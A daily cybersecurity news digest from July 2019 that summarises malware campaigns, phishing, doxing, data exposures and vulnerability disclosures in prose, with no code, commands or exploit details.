Silobreaker Daily Cyber Digest – 25 July 2019
Russian-made Monokle malware designed to spy on Android devices
- Lookout researchers discovered Monokle malware in 2018 and identified Russian-based company Special Technology Centre Ltd (STC), as the author behind the spyware. STC are currently sanctioned by the US Government due to the support they provided to the GRU during the 2016 US Presidential election.
- The researchers describe Monokle as ‘advanced mobile surveillanceware’, delivered through trojanized versions of legitimate apps which have been selected to primarily target English-speaking users. The infected apps also contain legitimate functions so as not to arouse the victim’s suspicion.
- Monokle possesses RAT functionality and is used to exfiltrate personal data. It also records the screen during device unlock and attempts to compromise a user’s password or PIN. Moreover, it installs attacker-specified certificates that could allow for man-in-the-middle attacks. The researchers stated that the malware is still being actively deployed.
WatchBog malware contains BlueKeep scanner
- Researchers at Intezer discovered a new variant of Watchbog malware that incorporates a RDP scanner to identify machines vulnerable to the BlueKeep exploit. BlueKeep, tracked as CVE-2019-0708, allows an attacker to gain RCE over a vulnerable system. The flaw is present in Windows 2000 to Windows Server 2008, and Windows 7.
- At present no public PoC exists for an RCE attack using CVE-2019-0708, however the inclusion of the BlueKeep scanner can still be useful for attackers who wish to prepare a list of systems that could become vulnerable in the future. Alternatively, the attackers could sell the list of vulnerable machines to a third party.
- The researchers commented on the high pace that malware authors are developing WatchBog. At present the malware also includes exploits for CVE-2019-11581, CVE-2019-10149, CVE-2019-0192, CVE-2018-1000861, and CVE-2019-7238.
WeTransfer abused to evade email gateways
- Researchers at Cofense discovered a wave of phishing attacks targeting major industries by using the file-hosting site WeTransfer to deliver malicious URLs.
- The attackers use compromised email accounts to send a genuine link to a WeTransfer hosted file, allowing them to bypass any security measures. The link redirects the victim to the WeTransfer download page where an HTM or HTML file is hosted. Once the victim downloads and opens this file, they are redirected to the main phishing page which asks for Office365 credentials.
BSI issues warning over new Sodinokibi ransomware campaign
- The German national cybersecurity authority, BSI, has issued a warning related to a malspam campaign that has been observed distributing the Sodinokibi ransomware via emails created to appear as official BSI correspondence. The emails use the subject line ‘Warnmeldung kompromittierter Benutzerdaten’, which translates to ‘Warning message of compromised user data’.
- The ZIP attachment delivered by the campaign affects targets after launching the Windows shortcut which poses as a PDF document within the archive. Upon execution, the shortcut launches a remote HTA file using a PowerShell command which prepends HTTP to the URL of the domain used to host the HTA payload.
- Sodinokibi encrypts the victim’s files, appends them with random extensions and drops ransom notes containing unique keys and links to the payment site which asks for $2,500 worth of Bitcoin which increases to $5,000 if the two-day timer expires.
Shade ransomware paired with Spelevo EK in click fraud campaign
- Researchers at Cybereason observed malicious actors targeting Japanese victims by using the Spelevo exploit kit (EK) in combination with Shade ransomware to perform click fraud.
- The infection mechanism is similar to that observed with the Fallout EK, in which users visit an infected website and are silently redirected to the EK’s landing page. The infected website is a supposedly legitimate TV service website, which is a change from the usual adult content websites.
- This campaign shows a deviation in the use of Shade, as the malware is usually used as ransomware. Click fraud is seen as a popular and quiet way to earn money by attackers and Cybereason research has found click fraud to be increasing by 50% every year.
Source (Includes IOCs)
Far right group uses dark web database to dox opponents
- Krebs on Security reported that almost three dozen journalists, as well as others, have been targeted by a far-right group that maintains a dark web database containing the personal information of those who threaten their personal views. The group encourages the harassment of those in their database and has claimed responsibility for several bomb threats and ‘swatting’ incidents.
- The site is named ‘Doxbin’, and contains the names, addresses, phone numbers, IP addresses, dates of birth and further sensitive information of hundreds of people including targets’ friends and families. Over 400 entries are for journalists, in addition to federal judges and executives at major corporations.
- Many on the list are targeted by threats and harassment, including computer technician Carey Holzman, who was swatted after his credentials appeared on Doxbin, and was threatened via phone calls several times. Doxbin is tied to an open IRC chat in which the members discuss alt-right and racist ideas, doxing and swatting, as well as audio and video news recordings of their attacks.
Major companies targeted by Winnti Group
- An investigation by German broadcasters BR and NDR into Winnti Group found that at least six DAX corporations were targeted in their ongoing campaign, including Siemens, BASF, and Henkel. Other targeted companies include Roche, Marriott, Lion Air, Covestro and Sumitomo Group and Shin-Etsu Chemical Group.
- Winnti Group, active since at least 2011, uses Winnti malware to spy on corporate networks and is believed to originate from China. More than 250 variants of Winnti malware were discovered, each containing the names of global corporations targeted. During the early stages of the campaign in 2011, the threat actors were focused on cybercrime to make money from game manufacturers, whereas the second phase, starting in 2014, shifted towards industrial espionage. The researchers also found evidence of possible political espionage.
- According to Reuters, Siemens, Henkel and Roche confirmed they were targeted by Winnti, whilst BASF and Covestro confirmed they suffered an attack. All companies stated that no sensitive information was lost during the attacks.
“Operation LagTime IT” targets government Information Technology agencies in East Asia
- Proofpoint researchers observed a targeted spear phishing campaign, dubbed ‘Operation LagTime IT’, using malicious RTF documents to deliver a custom malware called Cotx RAT by the researchers. The documents exploit a vulnerability in Microsoft Equation Editor, tracked as CVE-2018-0798.
- The threat actor also uses Poison Ivy payloads which share a similar C2 infrastructure with newly identified Cotx campaigns. The researchers attribute the activity to the Chinese APT TA428 and believe the campaign is similar in operation and tactics to the Maudi Surveillance Operation reported in 2013.
- Since the start of 2019, the campaign has mainly targeted East Asian government agencies responsible for overseeing government IT, domestic affairs, foreign affairs, economic development, and political processes.
Source (Includes IOCs)
APT17 associated with the Jinan bureau of China’s Ministry of State Security
- Cyber security analysts at Intrusion Truth stated that APT17 is likely managed by Guo Lin, an MSS officer from the Ministry’s Jinan Bureau.
- Guo Lin is also associated with several cyber security and technology companies that count the MSS as their clients. These companies are linked to two hackers from Jinan, and the authors behind APT17’s BLACKCOFFEE malware.
Leaks and Breaches
Over 86 million records exposed in open YouHodler database
- vpnMentor researchers discovered an open database belonging to the cryptocurrency lending platform YouHodler that exposed private information of thousands of individuals.
- Exposed data included users’ full names, email addresses, addresses, phone numbers, dates of birth, as well as full credential details and in some cases crypto wallet addresses, which were stored in plain text on the database.
Sky locks down accounts following detection of credential stuffing attack
- Sky has locked online accounts and advised users to reset their passwords as a safety measure after the telecom company detected a credential stuffing attack last month. Sky stated that the locked accounts had not been breached, and that it is merely a precautionary measure.
Nacho Analytics customers still have access to leaked data via Google Analytics
- Ars Technica revealed on July 18th, 2019, that the data of up to 4.1 million users was collected and made available to the customers of marketing intelligence firm Nacho Analytics. The data was collected by eight Chrome and Firefox browser extensions, the extensions were able to read and copy web links which resulted in the divulgence of personal and corporate information.
- On July 24th, 2019, Ars Technica reported that purchased data could still be accessed by Nacho Analytics customers who had acquired it before the offending extensions and Nacho Analytics were shut down. The data is still accessible due to Google Analytics importing the information into their customers’ accounts. Ars Technica reported that this could potentially mean that the browsing data of millions of people remains accessible.
Reports of critical vulnerability in VLC Media Player a false alarm
- Reports that an unpatched critical vulnerability, assigned as CVE-2019-13615, exists in VLC Media Player have turned out to be incorrect. The ‘security issue’ that was reported by MITRE was not an issue in VLC Media Player but in a third-party library, called libedml. Moreover, the flaw was patched over 16 months ago.
- The vulnerability was not tested by MITRE before they assigned a CVE ID. Following MITRE’s report Germany’s CERT-Bund issued an alert stating that VLC Media was open to exploitation by a critical vulnerability rated as 9.8 on the CVSS scale.
- The vulnerability was fixed in VLC 3.0.3, users running any version of VLC since 3.0.3 will not be impacted by the issue.
Stock Trading service Robinhood stored passwords in plain text
- Robinhood emailed impacted customers to inform them that their ‘credentials were stored in a readable format within our internal systems’. The company stated that users should reset their password as a precautionary measure and assured customers that they had no evidence suggesting that unauthorized parties accessed the information.
- Robinhood refused to tell reporters from ZDNet how many users were impacted, but confirmed that it was not an issue that affected all customers.
NinjaRMM used to spread ransomware
- On July 24th, 2019, a malicious actor was able to access a NinjaRMM customer account and deliver malware across multiple endpoints. The company stated that the breach was confined to one NinjaRMM customer and assured customers that the company itself was not breached.
13 vulnerabilities disclosed in Das U-Boot
- On July 22nd, 2019, Semmle disclosed 13 vulnerabilities in the open-source universal boot loader Das U-Boot. The vulnerabilities are exploitable when Das U-Boot is configured to use networking and NFS. Das U-Boot is primarily in this state when under development or under diskless configuration.
- The vulnerabilities could be exploited by an attacker who was in the same network or who controlled a malicious NFS server. An attacker who performed a successful exploitation could execute code on a U-Boot powered device.
- U-Boot developers have not released a final patch but a temporary, though not fully tested, patch has been released by Semmle.
Mitsubishi Inverter Engineering Software affected by several vulnerabilities
- Several vulnerabilities have been found in Mitsubishi Electric’s FR Configurator2 inverter engineering software that could potentially be exploited for information disclosure, arbitrary code execution, privilege escalation, and denial-of-service (DoS) attacks.
- One of the vulnerabilities, classified as ‘high severity’, exploited the tool’s XML external entity processing and could allow an attacker to read and steal arbitrary files. Another ‘high severity’ vulnerability was a local privilege escalation flaw, that could potentially allow a hacker with low privileges to execute a malicious file with escalated privileges when the application is launched.
- As a result, Mitsubishi has released version 1.16S that patches all revealed security holes and has also urged its customers to avoid opening files from untrusted sources.
Malwarebytes Labs publishes technical analysis of new Phobos malware
- Malwarebytes Labs has stated that Phobos malware is reportedly based on the Dharma Ransomware strain and is likely distributed by the same group. Phobos is distributed via hacked Remote Desktop (RDP) connections.
- Malwarebytes Lab’s report includes an analysis of the malware’s behaviour, the encryption process, obfuscation techniques, killing processes, targets, and more.
DDoS L7/Brute Force Attack targets entertainment company for nearly two weeks
- Imperva recorded an attack against one of their customers in the entertainment industry that lasted for 13 days between April 23rd, 2019, and May 5th, 2019. Attackers utilized a botnet that coordinated 402,000 IPs and at its peak sent 292,000 requests per second to the target site. The attack was the largest Layer 7 DDoS attack that Imperva has recorded.
- The attack originated in Brazil and was masked by using the same legitimate User-Agent as that used by the customer’s service application. Further analysis showed that most of the IPs used in the attack were IoT devices infected with Mirai malware.
The Silobreaker Team Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.